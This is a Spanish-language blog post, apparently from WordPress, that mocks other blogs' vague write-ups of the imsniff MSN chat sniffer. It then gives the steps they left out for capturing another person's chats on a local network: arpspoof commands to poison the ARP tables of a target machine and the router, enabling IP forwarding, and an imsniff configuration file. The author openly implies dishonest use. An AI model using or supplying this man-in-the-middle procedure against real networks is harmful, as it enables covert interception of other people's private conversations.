imsniff, bajo tu propio riesgo



Después de los correspondientes cafés matinales y breves antes de que el hartazgo dominical me hunda en la clásica zozobra vital y tomando como base argumental un hecho (i)real ocurrido ayer, agarro el teclado y transcribo:


.- Querido Baldo, he googleado el comando imsniff y más allá de las típicas observaciones … ya sabes: que el autor, autora en este caso, es la madrileña Amaya Rodriguez Sastre, la primera Debian Developer de toda Europa, que usa la biblioteca libcap, que se instala con apt-get install imsniff y que husmea conversaciones del msn, poca cosa más.

.- Ay amigo Archi, el primer recurso de algunos blogs linuxeros es la desfachatez de la copipasteada y el segundo es éste con el que te has dado de bruces: El autor no sólo ni se ha molestado en intentar enriquecer el contenido de lo copipasteado sino que demuestra una ignorancia supina sobre lo que (teóricamente) nos informa. Varios copipastean a Bitelia (naturalmente hay entradas anteriores) que es el blog que encabeza las busquedas de google. 

Lo dejamos no sin antes leer el enigmático “Comentario final”:

...es una herramienta que puesta en el lugar adecuado puede ofrecer excelentes resultados para oscuros y desconocidos propósitos. Dejo a tu consideración los usos alternativos...”

Texto muy usado en tutos de snifers varios y que siempre siembra la duda de si el autor es un “listillo” o “va de listillo” y pasamos al siguiente blog para ver si alguien con menos escrúpulos que Bitelia nos da alguna pista sobre los “oscuros y desconocidos propósitos” que dejan a nuestra consideración.

Angelux con fecha de post anterior a Bitelia, tampoco aporta nada, con el agravante de que “toca de oídas” puesto que termina su entrada con:

Estoy usando Arch asi que no lo he compilado aunque no puedo poner capturas.”

Vaya por Dios... Paso de largo por funnix que también termina haciéndose el interesante:

En conclusión, tienes aquí un comando que debes usarlo bajo tu propio riesgo, dependerá de los fines que le des, para que sea útil o no.”

Y se queda tan pancho. A estas alturas mi agitación es inmensa. ¿No será este comando la piedra filosofal?, ¿No habrá encerrado en él la madrileña toda la esencia de la vida?... En linuxapuntes después de una gran profusión de detalles sobre la instalación del prenda, al autor se le acaba la inspiración al ejecutarlo y sólo nos aclara la versión de libcap que precisa el comando. Paso por ubuntuaratodos y algunos blogs más, incluyendo mscerts que ha pegado el texto directamente del traductor sin medio adecentarlo ni nada.

A estas alturas, la agitación se va transformando en escepticismo. .- ¿Y si cuándo hablan de “usarlo bajo mi propio riesgo” se están refiriendo a que sobre imsnif existe una especie de conjuro o maldición que fulmina a todo el que lo use? .- Archi, no deberías leer tantas novelas de intriga o acabarás mal… Hasta en foro.raza-mexicana (vaya con el nombrecito!) alguien se pregunta: realmente con imsniff se puede capturar cualquier trafico de msn de una red o solo sirve para captar tus propios mensajes?”

Porque con lo leído hasta ahora, parece que el amigo imsniff sólo se puede usar para autoesnifarse la mandanga. ¡Pues no! Alguien podría habernos dado la pista de que este sniffer (como dsniff y tantos otros) para que realmente huela algo y no la propia sobaquera, hemos de colocar nuestro pc entre el sniffado y el router, lanzando en distintas terminales y sin cerrarlas:

# arpspoof -i eth1 -t 192.168.1.27 192.168.1.1
# arpspoof -i eth1 -t 192.168.1.1 192.168.1.27 

El “27” el sniffado, el “1” el router y el -i … la red. El paquete que contiene arpspoof es dsniff. Activar forwarding para que los paquetes vayan a su verdadero dueño:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Crear una carpeta donde recoger los datos:

$ mkdir capturas

Crear el archivo de configuración a partir de la documentación de imsniff:

# cp /usr/share/doc/imsniff/examples/imsniff.conf.sample /etc/imsniff.conf
# nano /etc/imsniff.conf 
daemonize = 0 
promisc = 0 
verbose = 2 
chatdir = /home/USER/capturas/chats 
debugdir = /home/USER/capturas/debug 
interface eth1 

USER, el que sea y los directorios “chats” y “debug” los creará la misma aplicación. Y luego si, lanzar el sniffer:

# imsniff

¡¡Grande eres Amaya!!

. debes usarlo bajo tu propio riesgo... y bla, bla, bla..... ¡estupideces!

Si no lo quisieras usar con fines deshonestos, en vez de trastear con un sniffer, estarías jugando a canicas en la calle o, como yo, saboreando una papas bravas en la terraza de un bar…

Una respuesta to “imsniff, bajo tu propio riesgo”

  1. magewhite Says:

    Excelente aclaración!!! Gracias

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s


A %d blogueros les gusta esto: